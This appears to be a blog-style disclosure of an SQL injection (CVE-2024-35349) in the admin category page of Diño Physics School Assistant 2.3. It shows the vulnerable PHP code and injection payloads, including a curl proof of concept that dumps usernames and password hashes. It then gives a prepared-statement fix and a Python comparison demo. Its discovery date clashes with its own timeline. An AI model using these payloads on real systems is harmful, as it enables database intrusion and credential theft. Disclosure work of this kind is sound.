In June 2024, security researchers identified a dangerous SQL Injection vulnerability in Diño Physics School Assistant, version 2.3. The flaw lives in the /admin/category/view_category.php file and lets attackers inject SQL through the id URL parameter, putting your database at risk and possibly leaking all of its sensitive data. This post explains how the bug works, shows how it is exploited, and helps you secure your system.

About Diño Physics School Assistant

Diño Physics School Assistant helps teachers manage physics lessons, quizzes, and resources online. Many schools use it to support their students and staff. But like many open-source PHP projects, it can carry critical vulnerabilities if its code is not reviewed.

The Vulnerability: Where and What?

Vulnerability: SQL Injection (CWE-89)
CVE: CVE-2024-35349
Affected File: /admin/category/view_category.php
Vulnerable Parameter: id in the GET request
Version: 2.3 and likely below

Vulnerable Code Snippet

The source of the vulnerability is the way user input from the URL is handled directly in an SQL query, like this:

// /admin/category/view_category.php (Simplified)
$id = $_GET['id'];                                   // raw, unvalidated user input
$sql = "SELECT * FROM category WHERE id = $id";      // interpolated straight into the SQL text
$result = mysqli_query($conn, $sql);

What's wrong:
There is no input validation or sanitization, leaving the SQL statement wide open to injection.

If you have access to the admin panel and visit

https://<site>/admin/category/view_category.php?id=1

You get details for category 1.

But an attacker can use

https://<site>/admin/category/view_category.php?id=1 OR 1=1

This turns the query into

SELECT * FROM category WHERE id = 1 OR 1=1

That gives ALL categories, ignoring access controls.

Attackers can do far worse – even _dump all user tables_!

A hacker could try

https://<site>/admin/category/view_category.php?id=1 UNION SELECT 1,@@version,3,4--

This returns the MySQL version, showing the exploit works.

Full Proof-of-Concept (PoC)

# Basic exploitation using curl
curl "https://target.com/admin/category/view_category.php?id=1 UNION SELECT 1,username,password,4 FROM users--"

This shows usernames and password hashes from the users table.

An attacker who recovers credentials this way could also gain further access if the application uses the database for authentication.

Complexity:
Low. Any user with access to /admin/category/view_category.php can exploit this.

Mitigation & Recommendations

1. UPDATE IMMEDIATELY: Check if there’s a patch or new release from Diño Physics School Assistant.

2. Fix the Code: Use prepared statements instead of building the query from user input.

// Use prepared statements: the id is bound as an integer value, never as SQL text
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM category WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();   // same $result the original code went on to use

3. Restrict Access: Limit access to /admin interface by IP or VPN.
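To make the difference between the vulnerable query and the prepared-statement fix concrete, here is an added example (not code from this post or from the Diño project) that reproduces both over a constructed three-row category table in SQLite, using Python instead of PHP; the table contents and function names are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the application's `category` table.
SAMPLE_CATEGORIES = [(1, "Mechanics"), (2, "Optics"), (3, "Thermodynamics")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE category (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO category VALUES (?, ?)", SAMPLE_CATEGORIES)
    return conn


def view_category_vulnerable(conn, raw_id):
    """Mirror of the original view_category.php: the raw id is pasted into SQL text."""
    sql = f"SELECT id, name FROM category WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def view_category_fixed(conn, raw_id):
    """Mirror of the prepared-statement fix: validate, then bind the id as data."""
    # bind_param("i") in the PHP fix coerces to int; here a non-numeric id is
    # rejected outright so the caller can answer HTTP 400 instead of guessing.
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, name FROM category WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def compare(raw_id):
    """Return (rows from the vulnerable code, rows or error text from the fixed code)."""
    conn = make_db()
    vulnerable = view_category_vulnerable(conn, raw_id)
    try:
        fixed = view_category_fixed(conn, raw_id)
    except ValueError as exc:
        fixed = str(exc)
    conn.close()
    return vulnerable, fixed


if __name__ == "__main__":
    for candidate in ("1", "1 OR 1=1"):
        print(repr(candidate), "->", compare(candidate))
```

With id=1 both versions return the single Mechanics row; with the `1 OR 1=1` value from the post the vulnerable version returns all three rows while the fixed version refuses the input before it ever reaches the database.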

Further Reading & References

- Original CVE record
- OWASP: SQL Injection
- How to Fix SQL Injection in PHP

Conclusion

CVE-2024-35349 in Diño Physics School Assistant 2.3 is a serious SQL Injection that can put your users’ data at risk. Patch as soon as possible, and always use secure coding practices!

Timeline

Published on: 05/30/2024 17:15:33 UTC
Last modified on: 08/01/2024 13:52:38 UTC